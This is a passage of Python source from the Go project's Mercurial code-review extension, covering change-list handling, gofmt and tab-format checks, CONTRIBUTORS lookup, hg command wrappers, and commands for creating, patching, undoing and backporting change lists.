                promptadd(ui, repo, f)
                files.append(f)
                continue
            if f in ignored:
                ui.warn("error: %s is excluded by .hgignore; omitting\n" % (f,))
                continue
            if f in clean:
                ui.warn("warning: %s is listed in the CL but unchanged\n" % (f,))
                files.append(f)
                continue
            # Not known to hg at all: classify by what is on disk.
            p = repo.root + '/' + f
            if os.path.isfile(p):
                ui.warn("warning: %s is a file but not known to hg\n" % (f,))
                files.append(f)
                continue
            if os.path.isdir(p):
                ui.warn("error: %s is a directory, not a file; omitting\n" % (f,))
                continue
            ui.warn("error: %s does not exist; omitting\n" % (f,))
        clx.files = files
        # Commit the accepted edit back into the caller's CL object.
        cl.desc = clx.desc
        cl.reviewer = clx.reviewer
        cl.cc = clx.cc
        cl.files = clx.files
        cl.private = clx.private
        break
    return ""
# For use by submit, etc. (NOT by change)
# Get change list number or list of files from command line.
# If files are given, make a new change list.
def CommandLineCL(ui, repo, pats, opts, op="verb", defaultcc=None):
    """Resolve command-line args to a CL: an existing number or a new CL from files.

    Returns (cl, '') on success or (None, errmsg) on failure.  op is the
    command name used in error messages.
    """
    if len(pats) > 0 and GoodCLName(pats[0]):
        # First argument is a CL number: load that CL.
        if len(pats) != 1:
            return None, "cannot specify change number and file names"
        if opts.get('message'):
            return None, "cannot use -m with existing CL"
        cl, err = LoadCL(ui, repo, pats[0], web=True)
        if err != "":
            return None, err
    else:
        # File patterns given: build a fresh CL from unclaimed changes.
        cl = CL("new")
        cl.local = True
        cl.files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))
        if not cl.files:
            return None, "no files changed (use hg %s <number> to use existing CL)" % op
    if opts.get('reviewer'):
        cl.reviewer = Add(cl.reviewer, SplitCommaSpace(opts.get('reviewer')))
    if opts.get('cc'):
        cl.cc = Add(cl.cc, SplitCommaSpace(opts.get('cc')))
    if defaultcc:
        cl.cc = Add(cl.cc, defaultcc)
    if cl.name == "new":
        if opts.get('message'):
            cl.desc = opts.get('message')
        else:
            # No -m: open the editor to fill in the description.
            err = EditCL(ui, repo, cl)
            if err != '':
                return None, err
    return cl, ""
#######################################################################
# Change list file management
# Return list of changed files in repository that match pats.
# The patterns came from the command line, so we warn
# if they have no effect or cannot be understood.
def ChangedFiles(ui, repo, pats, taken=None):
    """Return the sorted changed files matching pats, minus those in taken.

    Each pattern is also checked individually so the user gets warnings
    about patterns that matched nothing, and prompts to add/remove files
    hg doesn't track yet.
    """
    taken = taken or {}
    # Run each pattern separately so that we can warn about
    # patterns that didn't do anything useful.
    for p in pats:
        for f in hg_matchPattern(ui, repo, p, unknown=True):
            promptadd(ui, repo, f)
        for f in hg_matchPattern(ui, repo, p, removed=True):
            promptremove(ui, repo, f)
        files = hg_matchPattern(ui, repo, p, modified=True, added=True, removed=True)
        for f in files:
            if f in taken:
                ui.warn("warning: %s already in CL %s\n" % (f, taken[f].name))
        if not files:
            ui.warn("warning: %s did not match any modified files\n" % (p,))
    # Again, all at once (eliminates duplicates)
    l = hg_matchPattern(ui, repo, *pats, modified=True, added=True, removed=True)
    l.sort()
    if taken:
        l = Sub(l, taken.keys())
    return l
# Return list of changed files in repository that match pats and still exist.
def ChangedExistingFiles(ui, repo, pats, opts):
	# Changed files matching pats that still exist on disk (modified or
	# added, but not removed).  opts is unused; kept for call parity.
	names = hg_matchPattern(ui, repo, *pats, modified=True, added=True)
	return sorted(names)
# Return list of files claimed by existing CLs
def Taken(ui, repo):
	# Map each file claimed by a pending CL to the CL that claims it.
	claimed = {}
	for cl in LoadAllCL(ui, repo, web=False).values():
		for name in cl.files:
			claimed[name] = cl
	return claimed
# Return list of changed files that are not claimed by other CLs
def DefaultFiles(ui, repo, pats):
	# Changed files matching pats that no existing CL has claimed.
	claimed = Taken(ui, repo)
	return ChangedFiles(ui, repo, pats, taken=claimed)
#######################################################################
# File format checking.
def CheckFormat(ui, repo, files, just_warn=False):
	# Run every formatting check (gofmt, tab indentation) over files;
	# with just_warn the checks only warn instead of aborting.
	set_status("running gofmt")
	CheckGofmt(ui, repo, files, just_warn=just_warn)
	CheckTabfmt(ui, repo, files, just_warn=just_warn)
# Check that gofmt run on the list of files does not change them
def CheckGofmt(ui, repo, files, just_warn):
	# Run "gofmt -l" over the tracked .go files; warn (just_warn) or
	# abort if gofmt would reformat any of them.
	files = gofmt_required(files)
	if not files:
		return
	# gofmt runs in the current directory, so convert repo-relative
	# names to cwd-relative ones and drop files not present on disk.
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	files = [f for f in files if os.access(f, 0)]
	if not files:
		return
	try:
		cmd = subprocess.Popen(["gofmt", "-l"] + files, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=sys.platform != "win32")
		cmd.stdin.close()
	except:
		raise hg_util.Abort("gofmt: " + ExceptionDetail())
	# Read both streams before wait() to avoid blocking on full pipes.
	data = cmd.stdout.read()
	errors = cmd.stderr.read()
	cmd.wait()
	set_status("done with gofmt")
	# gofmt's own errors are reported but never abort the operation.
	if len(errors) > 0:
		ui.warn("gofmt errors:\n" + errors.rstrip() + "\n")
		return
	# "-l" lists the files that would change; any output means failure.
	if len(data) > 0:
		msg = "gofmt needs to format these files (run hg gofmt):\n" + Indent(data, "\t").rstrip()
		if just_warn:
			ui.warn("warning: " + msg + "\n")
		else:
			raise hg_util.Abort(msg)
	return
# Check that *.[chys] files indent using tabs.
def CheckTabfmt(ui, repo, files, just_warn):
	# Check that C/assembly/yacc sources under src/ indent with tabs.
	# Generated .tab.[ch] files are exempt.
	files = [f for f in files if f.startswith('src/') and re.search(r"\.[chys]$", f) and not re.search(r"\.tab\.[ch]$", f)]
	if not files:
		return
	cwd = os.getcwd()
	files = [RelativePath(repo.root + '/' + f, cwd) for f in files]
	files = [f for f in files if os.access(f, 0)]
	badfiles = []
	for name in files:
		try:
			for line in open(name, 'r'):
				# Four leading spaces is enough to complain about,
				# except that some Plan 9 code uses four spaces as the label indent,
				# so allow that.
				if line.startswith('    ') and not re.match('    [A-Za-z0-9_]+:', line):
					badfiles.append(name)
					break
		except:
			# ignore cannot open file, etc.
			pass
	if badfiles:
		msg = "these files use spaces for indentation (use tabs instead):\n\t" + "\n\t".join(badfiles)
		if just_warn:
			ui.warn("warning: " + msg + "\n")
		else:
			raise hg_util.Abort(msg)
	return
#######################################################################
# CONTRIBUTORS file parsing
# Cache of the parsed CONTRIBUTORS file, filled on first ReadContributors call.
contributorsCache = None
# Optional URL to fetch CONTRIBUTORS from instead of the local repo file.
contributorsURL = None
def ReadContributors(ui, repo):
	# Load the CONTRIBUTORS file (or contributorsURL override) as a dict
	# mapping lowercase email -> (name, primary email).  The result is
	# cached; on read failure a warning is printed and None is returned
	# without caching, so a later call will retry.
	global contributorsCache
	if contributorsCache is not None:
		return contributorsCache

	try:
		# `opening` remembers which source we tried, for the warning below.
		if contributorsURL is not None:
			opening = contributorsURL
			f = urllib2.urlopen(contributorsURL)
		else:
			opening = repo.root + '/CONTRIBUTORS'
			f = open(repo.root + '/CONTRIBUTORS', 'r')
	except:
		ui.write("warning: cannot open %s: %s\n" % (opening, ExceptionDetail()))
		return

	contributors = {}
	for line in f:
		# CONTRIBUTORS is a list of lines like:
		#	Person <email>
		#	Person <email> <alt-email>
		# The first email address is the one used in commit logs.
		if line.startswith('#'):
			continue
		m = re.match(r"([^<>]+\S)\s+(<[^<>\s]+>)((\s+<[^<>\s]+>)*)\s*$", line)
		if m:
			name = m.group(1)
			email = m.group(2)[1:-1]
			contributors[email.lower()] = (name, email)
			# Alternate addresses resolve to the same canonical identity.
			for extra in m.group(3).split():
				contributors[extra[1:-1].lower()] = (name, email)

	contributorsCache = contributors
	return contributors
def CheckContributor(ui, repo, user=None):
	# Require that user (or the configured username) appears in the
	# CONTRIBUTORS file; abort otherwise.  Returns "Name <email>".
	set_status("checking CONTRIBUTORS file")
	user, userline = FindContributor(ui, repo, user, warn=False)
	if userline:
		return userline
	raise hg_util.Abort("cannot find %s in CONTRIBUTORS" % (user,))
def FindContributor(ui, repo, user=None, warn=True):
	# Resolve user (default: the [ui] username from .hgrc) against the
	# CONTRIBUTORS file.  Returns (email, "Name <email>") on success,
	# or (lookup-key, None) when unknown.
	if not user:
		user = ui.config("ui", "username")
		if not user:
			raise hg_util.Abort("[ui] username is not configured in .hgrc")
	key = user.lower()
	angle = re.match(r".*<(.*)>", key)
	if angle:
		# "Name <email>" form: look up by the bare email address.
		key = angle.group(1)

	contributors = ReadContributors(ui, repo)
	if key not in contributors:
		if warn:
			ui.warn("warning: cannot find %s in CONTRIBUTORS\n" % (key,))
		return key, None

	name, email = contributors[key]
	return email, "%s <%s>" % (name, email)
#######################################################################
# Mercurial helper functions.
# Read http://mercurial.selenic.com/wiki/MercurialApi before writing any of these.
# We use the ui.pushbuffer/ui.popbuffer + hg_commands.xxx tricks for all interaction
# with Mercurial. It has proved the most stable as they make changes.
# Version of the running Mercurial, checked once at import time.
hgversion = hg_util.version()

# We require Mercurial 1.9 and suggest Mercurial 2.0.
# The details of the scmutil package changed then,
# so allowing earlier versions would require extra band-aids below.
# Ubuntu 11.10 ships with Mercurial 1.9.1 as the default version.
hg_required = "1.9"
hg_suggested = "2.0"

old_message = """

The code review extension requires Mercurial """+hg_required+""" or newer.
You are using Mercurial """+hgversion+""".

To install a new Mercurial, visit http://mercurial.selenic.com/downloads/.
"""

linux_message = """
You may need to clear your current Mercurial installation by running:

	sudo apt-get remove mercurial mercurial-common
	sudo rm -rf /etc/mercurial
"""

# NOTE(review): this is a plain lexicographic string comparison, so e.g.
# "1.10" would compare as older than "1.9" — adequate for the 1.9/2.0
# versions in play here, but verify before raising hg_required.
if hgversion < hg_required:
	msg = old_message
	if os.access("/etc/mercurial", 0):
		msg += linux_message
	raise hg_util.Abort(msg)
from mercurial.hg import clean as hg_clean
from mercurial import cmdutil as hg_cmdutil
from mercurial import error as hg_error
from mercurial import match as hg_match
from mercurial import node as hg_node
class uiwrap(object):
	"""Temporarily buffer and silence a Mercurial ui.

	Constructing the wrapper saves the current quiet/verbose settings,
	pushes a capture buffer, and forces quiet non-verbose output.
	output() restores the settings and returns the captured text.
	"""
	def __init__(self, ui):
		self.ui = ui
		self.oldQuiet = ui.quiet
		self.oldVerbose = ui.verbose
		ui.pushbuffer()
		ui.quiet = True
		ui.verbose = False
	def output(self):
		ui = self.ui
		ui.quiet = self.oldQuiet
		ui.verbose = self.oldVerbose
		return ui.popbuffer()
def to_slash(path):
	# Normalize Windows backslash separators to forward slashes; on any
	# other platform the path is returned untouched.
	if sys.platform != "win32":
		return path
	return path.replace('\\', '/')
def hg_matchPattern(ui, repo, *pats, **opts):
	# Run "hg status" with the given patterns/options and return the
	# matched file names, repo-root-relative with forward slashes.
	w = uiwrap(ui)
	hg_commands.status(ui, repo, *pats, **opts)
	text = w.output()
	ret = []
	prefix = to_slash(os.path.realpath(repo.root))+'/'
	for line in text.split('\n'):
		# Each status line is "<letter> <path>"; anything shorter
		# (blank lines, stray text) is skipped.
		f = line.split()
		if len(f) > 1:
			if len(pats) > 0:
				# Given patterns, Mercurial shows relative to cwd
				p = to_slash(os.path.realpath(f[1]))
				if not p.startswith(prefix):
					print >>sys.stderr, "File %s not in repo root %s.\n" % (p, prefix)
				else:
					ret.append(p[len(prefix):])
			else:
				# Without patterns, Mercurial shows relative to root (what we want)
				ret.append(to_slash(f[1]))
	return ret
def hg_heads(ui, repo):
	# Return the captured output of "hg heads" as a single string.
	wrapper = uiwrap(ui)
	hg_commands.heads(ui, repo)
	return wrapper.output()
# Status lines from Mercurial that carry no information for the user;
# pull/push output filters them out.
noise = [
	"",
	"resolving manifests",
	"searching for changes",
	"couldn't find merge tool hgmerge",
	"adding changesets",
	"adding manifests",
	"adding file changes",
	"all local heads known remotely",
]

def isNoise(line):
	# Report whether line is one of the known uninteresting messages.
	return str(line) in noise
def hg_incoming(ui, repo):
	# Run "hg incoming" and return its captured output.  Exit status 1
	# just means "nothing incoming"; any other non-zero status aborts.
	wrapper = uiwrap(ui)
	status = hg_commands.incoming(ui, repo, force=False, bundle="")
	if status and status != 1:
		raise hg_util.Abort(status)
	return wrapper.output()
def hg_log(ui, repo, **opts):
	# Run "hg log" with the given options, supplying the empty-string
	# defaults that the command insists on, and return its output.
	for key in ('date', 'keyword', 'rev', 'user'):
		opts.setdefault(key, "")
	wrapper = uiwrap(ui)
	status = hg_commands.log(ui, repo, **opts)
	if status:
		raise hg_util.Abort(status)
	return wrapper.output()
def hg_outgoing(ui, repo, **opts):
	# Run "hg outgoing" and return its captured output.  Exit status 1
	# just means "nothing outgoing"; any other non-zero status aborts.
	wrapper = uiwrap(ui)
	status = hg_commands.outgoing(ui, repo, **opts)
	if status and status != 1:
		raise hg_util.Abort(status)
	return wrapper.output()
def hg_pull(ui, repo, **opts):
	# Run "hg pull" verbosely, then echo the per-file output with noise
	# filtered and the verbs rewritten into short mv/+/- notation.
	w = uiwrap(ui)
	ui.quiet = False
	ui.verbose = True  # for file list
	err = hg_commands.pull(ui, repo, **opts)
	for line in w.output().split('\n'):
		if isNoise(line):
			continue
		# NOTE: these rewrites are order-dependent; once a line has been
		# rewritten its prefix changes, so at most one rule fires
		# ("getting ... to ..." becomes "mv", never "+").
		if line.startswith('moving '):
			line = 'mv ' + line[len('moving '):]
		if line.startswith('getting ') and line.find(' to ') >= 0:
			line = 'mv ' + line[len('getting '):]
		if line.startswith('getting '):
			line = '+ ' + line[len('getting '):]
		if line.startswith('removing '):
			line = '- ' + line[len('removing '):]
		ui.write(line + '\n')
	return err
def hg_push(ui, repo, **opts):
	# Run "hg push" with full output, echoing every captured line that
	# is not known Mercurial noise.  Returns the command's status.
	wrapper = uiwrap(ui)
	ui.quiet = False
	ui.verbose = True
	status = hg_commands.push(ui, repo, **opts)
	for line in wrapper.output().split('\n'):
		if isNoise(line):
			continue
		ui.write(line + '\n')
	return status
def hg_commit(ui, repo, *pats, **opts):
	# Thin pass-through to "hg commit".
	return hg_commands.commit(ui, repo, *pats, **opts)
#######################################################################
# Mercurial precommit hook to disable commit except through this interface.
# Set to True only around the commit that submit() itself performs;
# the precommit hook rejects every other commit attempt.
commit_okay = False

def precommithook(ui, repo, **opts):
	# Mercurial precommit hook: allow the commit only when it was
	# initiated through this extension (commit_okay toggled by submit).
	if commit_okay:
		return False # False means okay.
	ui.write("\ncodereview extension enabled; use mail, upload, or submit instead of commit\n\n")
	return True
#######################################################################
# @clnumber file pattern support
# We replace scmutil.match with the MatchAt wrapper to add the @clnumber pattern.
# State captured by InstallMatch for MatchAt: the active repo/ui and the
# original scmutil.match function being wrapped.
match_repo = None
match_ui = None
match_orig = None
def InstallMatch(ui, repo):
	# Splice our MatchAt wrapper into Mercurial's scmutil.match so that
	# @clnumber file patterns work everywhere; the original matcher is
	# kept so MatchAt can delegate to it.
	global match_repo, match_ui, match_orig
	match_ui = ui
	match_repo = repo
	from mercurial import scmutil
	match_orig = scmutil.match
	scmutil.match = MatchAt
def MatchAt(ctx, pats=None, opts=None, globbed=False, default='relpath'):
	# Replacement for scmutil.match that understands @clnumber patterns:
	# each @name pattern is expanded into explicit path: patterns for
	# that CL's files before delegating to the original matcher.
	taken = []
	files = []
	pats = pats or []
	opts = opts or {}
	for p in pats:
		if p.startswith('@'):
			taken.append(p)
			clname = p[1:]
			if clname == "default":
				# @default means every changed file not in any CL.
				files = DefaultFiles(match_ui, match_repo, [])
			else:
				if not GoodCLName(clname):
					raise hg_util.Abort("invalid CL name " + clname)
				cl, err = LoadCL(match_repo.ui, match_repo, clname, web=False)
				if err != '':
					raise hg_util.Abort("loading CL " + clname + ": " + err)
				if not cl.files:
					raise hg_util.Abort("no files in CL " + clname)
				files = Add(files, cl.files)
	# Replace the @ patterns with explicit per-file path: patterns.
	pats = Sub(pats, taken) + ['path:'+f for f in files]
	# work-around for http://selenic.com/hg/rev/785bbc8634f8
	if not hasattr(ctx, 'match'):
		ctx = ctx[None]
	return match_orig(ctx, pats=pats, opts=opts, globbed=globbed, default=default)
#######################################################################
# Commands added by code review extension.
def hgcommand(f):
	"""Decorator marking f as a command added by the code review
	extension; currently a no-op that returns f unchanged."""
	return f
#######################################################################
# hg change
@hgcommand
def change(ui, repo, *pats, **opts):
	"""create, edit or delete a change list

	Create, edit or delete a change list.
	A change list is a group of files to be reviewed and submitted together,
	plus a textual description of the change.
	Change lists are referred to by simple alphanumeric names.

	Changes must be reviewed before they can be submitted.

	In the absence of options, the change command opens the
	change list for editing in the default editor.

	Deleting a change with the -d or -D flag does not affect
	the contents of the files listed in that change. To revert
	the files listed in a change, use

		hg revert @123456

	before running hg change -d 123456.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	# dirty maps CL -> True for every CL that needs flushing at the end.
	dirty = {}
	if len(pats) > 0 and GoodCLName(pats[0]):
		# Operate on an existing CL named on the command line.
		name = pats[0]
		if len(pats) != 1:
			raise hg_util.Abort("cannot specify CL name and file patterns")
		pats = pats[1:]
		cl, err = LoadCL(ui, repo, name, web=True)
		if err != '':
			raise hg_util.Abort(err)
		if not cl.local and (opts["stdin"] or not opts["stdout"]):
			raise hg_util.Abort("cannot change non-local CL " + name)
	else:
		# No CL named: create a new one from the changed files.
		name = "new"
		cl = CL("new")
		if repo[None].branch() != "default":
			raise hg_util.Abort("cannot create CL outside default branch; switch with 'hg update default'")
		dirty[cl] = True
		files = ChangedFiles(ui, repo, pats, taken=Taken(ui, repo))

	# -d (delete on server) / -D (delete locally only).
	if opts["delete"] or opts["deletelocal"]:
		if opts["delete"] and opts["deletelocal"]:
			raise hg_util.Abort("cannot use -d and -D together")
		flag = "-d"
		if opts["deletelocal"]:
			flag = "-D"
		if name == "new":
			raise hg_util.Abort("cannot use "+flag+" with file patterns")
		if opts["stdin"] or opts["stdout"]:
			raise hg_util.Abort("cannot use "+flag+" with -i or -o")
		if not cl.local:
			raise hg_util.Abort("cannot change non-local CL " + name)
		if opts["delete"]:
			if cl.copied_from:
				raise hg_util.Abort("original author must delete CL; hg change -D will remove locally")
			# Mark the CL dead on the server before removing it locally.
			PostMessage(ui, cl.name, "*** Abandoned ***", send_mail=cl.mailed)
			EditDesc(cl.name, closed=True, private=cl.private)
		cl.Delete(ui, repo)
		return

	# -i: read a CL description from stdin and merge the fields given.
	if opts["stdin"]:
		s = sys.stdin.read()
		clx, line, err = ParseCL(s, name)
		if err != '':
			raise hg_util.Abort("error parsing change list: line %d: %s" % (line, err))
		if clx.desc is not None:
			cl.desc = clx.desc;
			dirty[cl] = True
		if clx.reviewer is not None:
			cl.reviewer = clx.reviewer
			dirty[cl] = True
		if clx.cc is not None:
			cl.cc = clx.cc
			dirty[cl] = True
		if clx.files is not None:
			cl.files = clx.files
			dirty[cl] = True
		if clx.private != cl.private:
			cl.private = clx.private
			dirty[cl] = True

	# Neither -i nor -o: open the CL in the editor.
	if not opts["stdin"] and not opts["stdout"]:
		if name == "new":
			cl.files = files
		err = EditCL(ui, repo, cl)
		if err != "":
			raise hg_util.Abort(err)
		dirty[cl] = True

	# Persist every CL we touched; a new CL is also uploaded to get
	# its server-assigned number.
	for d, _ in dirty.items():
		name = d.name
		d.Flush(ui, repo)
		if name == "new":
			d.Upload(ui, repo, quiet=True)

	if opts["stdout"]:
		ui.write(cl.EditorText())
	elif opts["pending"]:
		ui.write(cl.PendingText())
	elif name == "new":
		if ui.quiet:
			ui.write(cl.name)
		else:
			ui.write("CL created: " + cl.url + "\n")
	return
#######################################################################
# hg code-login (broken?)
@hgcommand
def code_login(ui, repo, **opts):
	"""log in to code review server

	Logs in to the code review server, saving a cookie in
	a file in your home directory.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	# NOTE(review): a None request presumably runs just the
	# authentication handshake, which saves the cookie — confirm
	# against MySend's implementation.
	MySend(None)
#######################################################################
# hg clpatch / undo / release-apply / download
# All concerned with applying or unapplying patches to the repository.
@hgcommand
def clpatch(ui, repo, clname, **opts):
	"""import a patch from the code review server

	Imports a patch from the code review server into the local client.
	If the local client has already modified any of the files that the
	patch modifies, this command will refuse to apply the patch.

	Submitting an imported patch will keep the original author's
	name as the Author: line but add your own name to a Committer: line.
	"""
	branch = repo[None].branch()
	if branch != "default":
		raise hg_util.Abort("cannot run hg clpatch outside default branch")
	failure = clpatch_or_undo(ui, repo, clname, opts, mode="clpatch")
	if failure:
		raise hg_util.Abort(failure)
@hgcommand
def undo(ui, repo, clname, **opts):
	"""undo the effect of a CL

	Creates a new CL that undoes an earlier CL.
	After creating the CL, opens the CL text for editing so that
	you can add the reason for the undo to the description.
	"""
	branch = repo[None].branch()
	if branch != "default":
		raise hg_util.Abort("cannot run hg undo outside default branch")
	failure = clpatch_or_undo(ui, repo, clname, opts, mode="undo")
	if failure:
		raise hg_util.Abort(failure)
@hgcommand
def release_apply(ui, repo, clname, **opts):
	"""apply a CL to the release branch

	Creates a new CL copying a previously committed change
	from the main branch to the release branch.
	The current client must either be clean or already be in
	the release branch.

	The release branch must be created by starting with a
	clean client, disabling the code review plugin, and running:

		hg update weekly.YYYY-MM-DD
		hg branch release-branch.rNN
		hg commit -m 'create release-branch.rNN'
		hg push --new-branch

	Then re-enable the code review plugin.

	People can test the release branch by running

		hg update release-branch.rNN

	in a clean client. To return to the normal tree,

		hg update default

	Move changes since the weekly into the release branch
	using hg release-apply followed by the usual code review
	process and hg submit.

	When it comes time to tag the release, record the
	final long-form tag of the release-branch.rNN
	in the *default* branch's .hgtags file. That is, run

		hg update default

	and then edit .hgtags as you would for a weekly.
	"""
	c = repo[None]
	if not releaseBranch:
		raise hg_util.Abort("no active release branches")
	# Switch into the release branch first (only from a clean client).
	if c.branch() != releaseBranch:
		if c.modified() or c.added() or c.removed():
			raise hg_util.Abort("uncommitted local changes - cannot switch branches")
		err = hg_clean(repo, releaseBranch)
		if err:
			raise hg_util.Abort(err)
	# On any failure, switch back to default before propagating.
	try:
		err = clpatch_or_undo(ui, repo, clname, opts, mode="backport")
		if err:
			raise hg_util.Abort(err)
	except Exception, e:
		hg_clean(repo, "default")
		raise e
def rev2clname(rev):
	# Extract the CL number from a revision description.  The last line
	# that is a codereview URL is authoritative; earlier ones may be
	# part of the user-written description.  Returns "" when absent.
	matches = re.findall('(?m)^https?://codereview.appspot.com/([0-9]+)$', rev.description())
	if matches:
		return matches[-1]
	return ""
undoHeader = """undo CL %s / %s
<enter reason for undo>
««« original CL description
"""
undoFooter = """
»»»
"""
backportHeader = """[%s] %s
««« CL %s / %s
"""
backportFooter = """
»»»
"""
# Implementation of clpatch/undo.
# Implementation of clpatch/undo.
def clpatch_or_undo(ui, repo, clname, opts, mode):
	# Shared engine for clpatch, undo, and release-apply (backport).
	# Obtains a patch (downloaded for clpatch, generated by "hg diff"
	# for undo/backport), ports its line numbers if the client has
	# moved on, applies it with hgapplydiff, and files the result as a
	# new local CL.  Returns "" on success or an error string.
	if codereview_disabled:
		return codereview_disabled

	if mode == "undo" or mode == "backport":
		# Find revision in Mercurial repository.
		# Assume CL number is 7+ decimal digits.
		# Otherwise is either change log sequence number (fewer decimal digits),
		# hexadecimal hash, or tag name.
		# Mercurial will fall over long before the change log
		# sequence numbers get to be 7 digits long.
		if re.match('^[0-9]{7,}$', clname):
			found = False
			for r in hg_log(ui, repo, keyword="codereview.appspot.com/"+clname, limit=100, template="{node}\n").split():
				rev = repo[r]
				# Last line with a code review URL is the actual review URL.
				# Earlier ones might be part of the CL description.
				n = rev2clname(rev)
				if n == clname:
					found = True
					break
			if not found:
				return "cannot find CL %s in local repository" % clname
		else:
			rev = repo[clname]
			if not rev:
				return "unknown revision %s" % clname
			clname = rev2clname(rev)
			if clname == "":
				return "cannot find CL name in revision description"

		# Create fresh CL and start with patch that would reverse the change.
		vers = hg_node.short(rev.node())
		cl = CL("new")
		desc = str(rev.description())
		if mode == "undo":
			cl.desc = (undoHeader % (clname, vers)) + desc + undoFooter
		else:
			# NOTE(review): uses undoFooter rather than backportFooter;
			# the two strings are currently identical, but backportFooter
			# is otherwise unused — confirm which was intended.
			cl.desc = (backportHeader % (releaseBranch, line1(desc), clname, vers)) + desc + undoFooter
		v1 = vers
		v0 = hg_node.short(rev.parents()[0].node())
		# undo diffs new->old (reversing); backport diffs old->new.
		if mode == "undo":
			arg = v1 + ":" + v0
		else:
			vers = v0
			arg = v0 + ":" + v1
		patch = RunShell(["hg", "diff", "--git", "-r", arg])

	else:  # clpatch
		cl, vers, patch, err = DownloadCL(ui, repo, clname)
		if err != "":
			return err
		if patch == emptydiff:
			return "codereview issue %s has no diff" % clname

	# find current hg version (hg identify)
	ctx = repo[None]
	parents = ctx.parents()
	id = '+'.join([hg_node.short(p.node()) for p in parents])

	# if version does not match the patch version,
	# try to update the patch line numbers.
	if vers != "" and id != vers:
		# "vers in repo" gives the wrong answer
		# on some versions of Mercurial.  Instead, do the actual
		# lookup and catch the exception.
		try:
			repo[vers].description()
		except:
			return "local repository is out of date; sync to get %s" % (vers)
		patch1, err = portPatch(repo, patch, vers, id)
		if err != "":
			if not opts["ignore_hgapplydiff_failure"]:
				return "codereview issue %s is out of date: %s (%s->%s)" % (clname, err, vers, id)
		else:
			patch = patch1
	argv = ["hgapplydiff"]
	if opts["no_incoming"] or mode == "backport":
		argv += ["--checksync=false"]
	try:
		cmd = subprocess.Popen(argv, shell=False, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=None, close_fds=sys.platform != "win32")
	except:
		return "hgapplydiff: " + ExceptionDetail() + "\nInstall hgapplydiff with:\n$ go get code.google.com/p/go.codereview/cmd/hgapplydiff\n"

	# hgapplydiff prints the file names it touched on stdout.
	out, err = cmd.communicate(patch)
	if cmd.returncode != 0 and not opts["ignore_hgapplydiff_failure"]:
		return "hgapplydiff failed"
	cl.local = True
	cl.files = out.strip().split()
	if not cl.files and not opts["ignore_hgapplydiff_failure"]:
		return "codereview issue %s has no changed files" % clname
	files = ChangedFiles(ui, repo, [])
	extra = Sub(cl.files, files)
	if extra:
		ui.warn("warning: these files were listed in the patch but not changed:\n\t" + "\n\t".join(extra) + "\n")
	cl.Flush(ui, repo)
	if mode == "undo":
		# Let the user record the reason for the undo.
		err = EditCL(ui, repo, cl)
		if err != "":
			return "CL created, but error editing: " + err
		cl.Flush(ui, repo)
	else:
		ui.write(cl.PendingText() + "\n")
# portPatch rewrites patch from being a patch against
# oldver to being a patch against newver.
def portPatch(repo, patch, oldver, newver):
	# Rewrite the @@ hunk headers of patch (made against oldver) so the
	# patch applies against newver, shifting line numbers by the deltas
	# of each file's intervening changes.  Returns (newpatch, "") or
	# (None/"", error).
	lines = patch.splitlines(True) # True = keep \n
	delta = None
	for i in range(len(lines)):
		line = lines[i]
		if line.startswith('--- a/'):
			# New file section: compute its oldver->newver deltas.
			file = line[6:-1]
			delta = fileDeltas(repo, file, oldver, newver)
		if not delta or not line.startswith('@@ '):
			continue
		# @@ -x,y +z,w @@ means the patch chunk replaces
		# the original file's line numbers x up to x+y with the
		# line numbers z up to z+w in the new file.
		# Find the delta from x in the original to the same
		# line in the current version and add that delta to both
		# x and z.
		m = re.match('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@', line)
		if not m:
			return None, "error parsing patch line numbers"
		n1, len1, n2, len2 = int(m.group(1)), int(m.group(2)), int(m.group(3)), int(m.group(4))
		d, err = lineDelta(delta, n1, len1)
		if err != "":
			return "", err
		n1 += d
		n2 += d
		lines[i] = "@@ -%d,%d +%d,%d @@\n" % (n1, len1, n2, len2)

	newpatch = ''.join(lines)
	return newpatch, ""
# fileDelta returns the line number deltas for the given file's
# changes from oldver to newver.
# The deltas are a list of (n, len, newdelta) triples that say
# lines [n, n+len) were modified, and after that range the
# line numbers are +newdelta from what they were before.
def fileDeltas(repo, file, oldver, newver):
	# Parse the "hg diff" hunk headers for file between oldver and
	# newver into (start, length, delta-after) triples: lines
	# [start, start+length) changed, and lines after that range shift
	# by delta-after.
	cmd = ["hg", "diff", "--git", "-r", oldver + ":" + newver, "path:" + file]
	hunk = re.compile('@@ -([0-9]+),([0-9]+) \+([0-9]+),([0-9]+) @@')
	deltas = []
	for line in RunShell(cmd, silent_ok=True).splitlines():
		m = hunk.match(line)
		if not m:
			continue
		start, length = int(m.group(1)), int(m.group(2))
		nstart, nlength = int(m.group(3)), int(m.group(4))
		deltas.append((start, length, nstart + nlength - (start + length)))
	return deltas
# lineDelta finds the appropriate line number delta to apply to the lines [n, n+len).
# It returns an error if those lines were rewritten by the patch.
def lineDelta(deltas, n, len):
	# Find the line-number delta to apply to the chunk covering original
	# lines [n, n+len), given deltas from fileDeltas: (old, oldlen,
	# newdelta) triples ordered by old.  Returns (delta, "") on success,
	# or (0, error) when the chunk overlaps a region that was itself
	# rewritten.  (The parameter name "len" shadows the builtin; kept
	# for interface compatibility.)
	d = 0
	for (old, oldlen, newdelta) in deltas:
		if old >= n+len:
			# Deltas are ordered; nothing past here touches [n, n+len).
			break
		# Bug fix: the overlap test must use the modified region's own
		# length (oldlen), not the patch chunk's length (len) —
		# otherwise conflicts with intervening edits go undetected.
		if old+oldlen > n:
			return 0, "patch and recent changes conflict"
		d = newdelta
	return d, ""
@hgcommand
def download(ui, repo, clname, **opts):
	"""download a change from the code review server

	Download prints a description of the given change list
	followed by its diff, downloaded from the code review server.
	"""
	if codereview_disabled:
		raise hg_util.Abort(codereview_disabled)

	cl, vers, patch, err = DownloadCL(ui, repo, clname)
	if err != "":
		return err
	# Print the CL text first, then the raw diff.
	ui.write(cl.EditorText() + "\n")
	ui.write(patch + "\n")
	return
#######################################################################
# hg file
@hgcommand
def file(ui, repo, clname, pat, *pats, **opts):
	"""assign files to or remove files from a change list

	Assign files to or (with -d) remove files from a change list.

